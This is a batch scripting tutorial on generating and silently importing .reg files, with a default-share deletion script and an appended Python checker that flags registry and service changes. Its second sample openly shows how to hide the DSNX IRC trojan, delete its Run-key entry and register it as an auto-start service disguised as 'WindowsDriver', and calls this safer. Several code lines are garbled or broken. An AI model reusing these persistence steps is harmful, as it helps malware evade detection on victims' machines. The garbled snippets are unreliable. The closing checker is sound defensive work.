Batch Scripting Tutorial: && (2)

2020-03-29 19:07

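After running this script, [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] has been deleted. By this point you should have a basic grasp of .reg files. The goal now is to use a batch file to create a .reg file with specific content; recall from earlier that the redirection operators make it easy to create files of a particular type.

sample1: As in the example above, suppose you want to generate the following registry file:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
\\
\

You only need this:

@echo Windows Registry Editor Version 5.00>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>Sample.reg
@echo \
@echo \
@echo \

sample2: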

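When we use some older trojans today, they may create a value under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (Runonce, Runservices, Runexec)] in the registry so that the trojan starts automatically. However, this easily exposes the path of the trojan program, which leads to the trojan being detected and removed; by comparison, registering the trojan program as a system service is relatively safer. The following uses an already configured IRC trojan, DSNX (named windrv32.exe), as an example:

@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo \
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [Delete DSNX's startup entry from the registry, use sc.exe to register it as a critical system service while setting its attributes to hidden and read-only, and config it to start automatically]
@REM Isn't this safer ^_^.

6. Example showcase.

1. A batch file that deletes the default shares on win2k/xp systems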

------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares. When ready press any key.
@pause
@echo off
rem check parameters if null show usage.
if {%1}=={} goto :Usage
rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleted
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg
echo \
echo \
echo Now using the registry file to change the system default properties.
regedit /s c:\delshare.reg
echo Deleting the temporary files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ An example for batch file ☆
echo ☆ [Use batch file to change the system share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disk labels are not C: D: E: ,please change it yourself.
echo.
echo example:
echo If local disk labels are C: D: E: X: Y: Z: ,you should change the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares at once ***
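
Both scripts above follow the same pattern: lines are echoed into a file with redirection, and that file is then imported silently with regedit /s. The following is an added example, not part of the original tutorial, of a static check a reviewer could run over a batch file before trusting it. The names audit_batch, WATCHED_KEYS and the finding labels are assumptions made for this example, and SAMPLE is a constructed script.

```python
import re

# Key paths the scripts on this page touch (lower-cased substrings).
WATCHED_KEYS = ("\\currentversion\\run", "\\services\\lanmanserver\\parameters")

ECHO_TO_FILE = re.compile(r"^@?echo\s*(?P<text>.*?)\s*>{1,2}\s*(?P<file>\S+)$", re.I)
REG_IMPORT = re.compile(
    r"^@?(?:regedit(?:\.exe)?\s+/s|reg(?:\.exe)?\s+import)\s+(?P<file>\S+)", re.I)
REG_KEY = re.compile(r"^\[(?P<delete>-?)(?P<key>HKEY_[^\]]+)\]$", re.I)
SC_CREATE = re.compile(r"^@?sc(?:\.exe)?\s+create\s+(?P<name>\S+)", re.I)

# Constructed sample, modelled on the echo / regedit /s pattern shown above.
SAMPLE = r"""@echo off
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg
regedit /s c:\delshare.reg
@echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Example\Constructed] >>patch.dll
@sc.exe create ExampleSvc start= auto binpath= c:\example\svc.exe
@regedit /s patch.dll
"""

def audit_batch(script):
    """Return (finding, detail) tuples for registry and service changes a batch script makes."""
    written = {}    # lower-cased file name -> text echoed into it
    findings = []
    for raw in script.splitlines():
        line = raw.strip()
        if m := ECHO_TO_FILE.match(line):
            written.setdefault(m["file"].lower(), []).append(m["text"])
        elif m := SC_CREATE.match(line):
            findings.append(("service-create", m["name"]))
        elif m := REG_IMPORT.match(line):
            name = m["file"]
            if not name.lower().endswith(".reg"):
                findings.append(("disguised-reg-file", name))
            for text in written.get(name.lower(), []):
                k = REG_KEY.match(text)
                if not k:
                    continue
                if k["delete"]:
                    findings.append(("key-delete", k["key"]))
                elif any(w in k["key"].lower() for w in WATCHED_KEYS):
                    findings.append(("watched-key-write", k["key"]))
    return findings

if __name__ == "__main__":
    for finding in audit_batch(SAMPLE):
        print(finding)
```

The check only reports keys whose file is later imported, so a script that merely writes text files produces no findings.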

